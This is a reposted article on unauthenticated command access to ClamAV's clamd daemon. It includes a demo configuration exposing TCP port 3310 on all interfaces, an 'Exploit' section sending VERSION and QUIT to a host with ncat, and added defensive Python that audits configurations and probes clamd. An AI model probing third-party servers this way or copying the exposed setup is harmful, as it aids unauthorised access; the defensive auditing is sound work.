exploit - ClamAV servers vulnerable to unauthenticated clamav command execution.

Source: Internet | Posted: java form attributes | Editor: 程序博客网 | Time: 2024/05/21 23:21

ClamAV® is an open source antivirus engine for detecting trojans, viruses, malware & other malicious threats.

Setup Clamav Environment

$ sudo apt-get install clamav clamav-daemon
$ sudo freshclam
$ sudo clamd --config-file=/etc/clamav/clamd.conf

If you don’t have clamd.conf, please try the demo configuration:

#Automatically Generated by clamav-daemon postinst
#To reconfigure clamd run #dpkg-reconfigure clamav-daemon
#Please read /usr/share/doc/clamav-daemon/README.Debian.gz for details
LocalSocket /var/run/clamav/clamd.ctl
FixStaleSocket true
LocalSocketGroup clamav
LocalSocketMode 666
# TCP port address.
# Default: no
TCPSocket 3310
# TCP address.
# By default we bind to INADDR_ANY, probably not wise.
# Enable the following to provide some degree of protection
# from the outside world.
# Default: no
TCPAddr 0.0.0.0
# Maximum length the queue of pending connections may grow to.
# Default: 15
MaxConnectionQueueLength 30
# Clamd uses FTP-like protocol to receive data from remote clients.
# If you are using clamav-milter to balance load between remote clamd daemons
# on firewall servers you may need to tune the options below.
# Close the connection when the data size limit is exceeded.
# The value should match your MTA's limit for a maximum attachment size.
# Default: 10M
StreamMaxLength 55M
# Limit port range.
# Default: 1024
#StreamMinPort 30000
# Default: 2048
#StreamMaxPort 32000
# Maximum number of threads running at the same time.
# Default: 10
MaxThreads 50
# Waiting for data from a client socket will timeout after this time (seconds).
# Value of 0 disables the timeout.
# Default: 120
ReadTimeout 300
# Waiting for a new job will timeout after this time (seconds).
# Default: 30
#IdleTimeout 60
# Maximum depth directories are scanned at.
# Default: 15
#MaxDirectoryRecursion 20
# TemporaryDirectory is not set to its default /tmp here to make overriding
# the default with environment variables TMPDIR/TMP/TEMP possible
User clamav
ScanMail true
ScanArchive true
ArchiveBlockEncrypted false
MaxDirectoryRecursion 15
FollowDirectorySymlinks false
FollowFileSymlinks false
ReadTimeout 180
MaxThreads 12
MaxConnectionQueueLength 15
LogSyslog false
LogRotate true
LogFacility LOG_LOCAL6
LogClean false
LogVerbose false
DatabaseDirectory /var/lib/clamav
OfficialDatabaseOnly false
SelfCheck 3600
Foreground false
Debug false
ScanPE true
MaxEmbeddedPE 10M
ScanOLE2 true
ScanPDF true
ScanHTML true
MaxHTMLNormalize 10M
MaxHTMLNoTags 2M
MaxScriptNormalize 5M
MaxZipTypeRcg 1M
ScanSWF true
DetectBrokenExecutables false
ExitOnOOM false
LeaveTemporaryFiles false
AlgorithmicDetection true
ScanELF true
IdleTimeout 30
CrossFilesystems true
PhishingSignatures true
PhishingScanURLs true
PhishingAlwaysBlockSSLMismatch false
PhishingAlwaysBlockCloak false
PartitionIntersection false
DetectPUA false
ScanPartialMessages false
HeuristicScanPrecedence false
StructuredDataDetection false
CommandReadTimeout 5
SendBufTimeout 200
MaxQueue 100
ExtendedDetectionInfo true
OLE2BlockMacros false
ScanOnAccess false
AllowAllMatchScan true
ForceToDisk false
DisableCertCheck false
DisableCache false
MaxScanSize 100M
MaxFileSize 25M
MaxRecursion 16
MaxFiles 10000
MaxPartitions 50
MaxIconsPE 100
PCREMatchLimit 10000
PCRERecMatchLimit 5000
PCREMaxFileSize 25M
ScanXMLDOCS true
ScanHWP3 true
MaxRecHWP3 16
StatsEnabled false
StatsPEDisabled true
StatsHostID auto
StatsTimeout 10
StreamMaxLength 25M
LogFile /var/log/clamav/clamav.log
LogTime true
LogFileUnlock false
LogFileMaxSize 0
Bytecode true
BytecodeSecurity TrustSigned
BytecodeTimeout 60000
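The settings that matter for exposure in the configuration above are TCPSocket, TCPAddr and LocalSocketMode: clamd has no authentication of its own, so whoever can reach the socket can issue clamd commands. As an added example (not part of the original post and not ClamAV's code), here is a small Python checker that parses a clamd.conf and flags a TCP listener bound to all interfaces (or with TCPAddr unset, which the file's own comment says means INADDR_ANY) and a world-writable Unix socket. The two configuration samples inside it are constructed from the lines above, and the function names are mine.

```python
import re

# Constructed sample: the exposure-relevant lines of the demo configuration above.
RISKY_CONF = """\
# Automatically generated by clamav-daemon postinst
LocalSocket /var/run/clamav/clamd.ctl
LocalSocketGroup clamav
LocalSocketMode 666
# Default: no
TCPSocket 3310
# By default we bind to INADDR_ANY, probably not wise.
TCPAddr 0.0.0.0
MaxThreads 50
MaxThreads 12
"""

# Constructed sample: the same listener confined to loopback, socket not world-writable.
HARDENED_CONF = """\
LocalSocket /var/run/clamav/clamd.ctl
LocalSocketGroup clamav
LocalSocketMode 660
TCPSocket 3310
TCPAddr 127.0.0.1
"""


def parse_clamd_conf(text):
    """Parse clamd.conf text into {option: [value, ...]}.

    Comments and blank lines are skipped.  Options that appear more than once
    (the demo file above repeats MaxThreads, ReadTimeout, ...) keep every
    value in file order; for scalar options clamd takes the last one, so the
    audit below looks at [-1].
    """
    options = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^(\w+)\s*(.*)$", line)
        if m:
            options.setdefault(m.group(1), []).append(m.group(2).strip())
    return options


def audit_socket_exposure(text):
    """Return a list of findings about who can reach clamd's command socket."""
    opts = parse_clamd_conf(text)
    findings = []

    tcp = opts.get("TCPSocket", [])
    if tcp and tcp[-1].lower() != "no":
        port = tcp[-1]
        # TCPAddr unset means INADDR_ANY, per the comment in the demo config above.
        addr = opts.get("TCPAddr", ["0.0.0.0"])[-1]
        if addr in ("0.0.0.0", "::", "::0"):
            findings.append(
                f"TCPSocket {port} listens on all interfaces ({addr}): any host that "
                "can reach the port can issue clamd commands, no authentication exists")
        elif not (addr.startswith("127.") or addr == "::1"):
            findings.append(
                f"TCPSocket {port} listens on non-loopback address {addr}: "
                "restrict reachability with a firewall or drop TCPSocket")

    # Octal mode string; an 'others write' bit lets every local account talk to clamd.
    mode = opts.get("LocalSocketMode", [None])[-1]
    if mode and len(mode) >= 3 and int(mode[-1], 8) & 0o2:
        findings.append(
            f"LocalSocketMode {mode} makes the Unix socket world-writable: "
            "every local account can issue clamd commands")
    return findings


if __name__ == "__main__":
    for name, conf in (("risky", RISKY_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_socket_exposure(conf) or ["no exposure findings"])
```

Run audit_socket_exposure() over the contents of a real /etc/clamav/clamd.conf; an empty list means the command socket is reachable only from loopback and only by permitted local accounts, which is the only control available since the daemon does not authenticate callers.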

Exploit

$ python -c 'print "VERSION\n"' | ncat 172.16.176.129 3310
ClamAV 0.99.2/21726/Mon Jun 13 21:54:30 2016
$ python -c 'print "QUIT\n"' | ncat 172.16.176.129 3310
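The VERSION/QUIT exchange above, written out as an added Python example (not the original post's code and not ClamAV's) so that both sides of the protocol are visible. probe_clamd() is the client side a defender can point at their own deployment to confirm the listener is not reachable from where it should not be; _serve_once() is a constructed stand-in that answers the way clamd does, with no authentication step, so the example runs offline. The function names and the version string the stand-in replies with are mine.

```python
import socket
import threading

# Constructed reply, in the "ClamAV <engine>/<db version>/<db date>" shape seen above.
FAKE_VERSION = "ClamAV 0.0.0-example/0/Mon Jan  1 00:00:00 2000"


def probe_clamd(host, port, timeout=3.0):
    """Client side of the exchange above: send VERSION, read the reply, send QUIT.

    Returns the version line if a clamd answered, None otherwise.  There is no
    login or token in this protocol: a reply means anyone with network reach
    to host:port can drive the daemon.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"VERSION\n")
            data = b""
            while not data.endswith(b"\n"):
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
            s.sendall(b"QUIT\n")
    except OSError:  # connection refused, unreachable, or timed out
        return None
    line = data.decode("ascii", "replace").strip()
    return line if line.startswith("ClamAV") else None


def _serve_once(listener):
    """Constructed stand-in for clamd's command loop (not ClamAV code).

    Handles one connection, answering VERSION and PING and stopping on QUIT,
    and is exactly as unauthenticated as the real daemon: it never checks who
    connected.
    """
    conn, _ = listener.accept()
    listener.close()
    with conn:
        buf = b""
        while True:
            chunk = conn.recv(1024)
            if not chunk:
                return
            buf += chunk
            while b"\n" in buf:
                cmd, buf = buf.split(b"\n", 1)
                if cmd == b"VERSION":
                    conn.sendall(FAKE_VERSION.encode("ascii") + b"\n")
                elif cmd == b"PING":
                    conn.sendall(b"PONG\n")
                elif cmd == b"QUIT":
                    return


def start_fake_clamd():
    """Bind the stand-in to an ephemeral loopback port and return that port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    threading.Thread(target=_serve_once, args=(listener,), daemon=True).start()
    return port


def demo():
    """Run the exchange against the stand-in; returns the version line it served."""
    return probe_clamd("127.0.0.1", start_fake_clamd())


if __name__ == "__main__":
    print(demo())
```

Run probe_clamd() against your own clamd from a network position that should not be able to reach it; a version line coming back is the finding, and the remediation lives in the configuration (TCPAddr on loopback, or LocalSocket only) and in firewalling the port, because nothing in the protocol itself will refuse the caller.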

For more clamd usage, please read the manual:

$ man clamd

References

http://seclists.org/nmap-dev/2016/q2/201
https://www.clamav.net/documents/installing-clamav
https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf
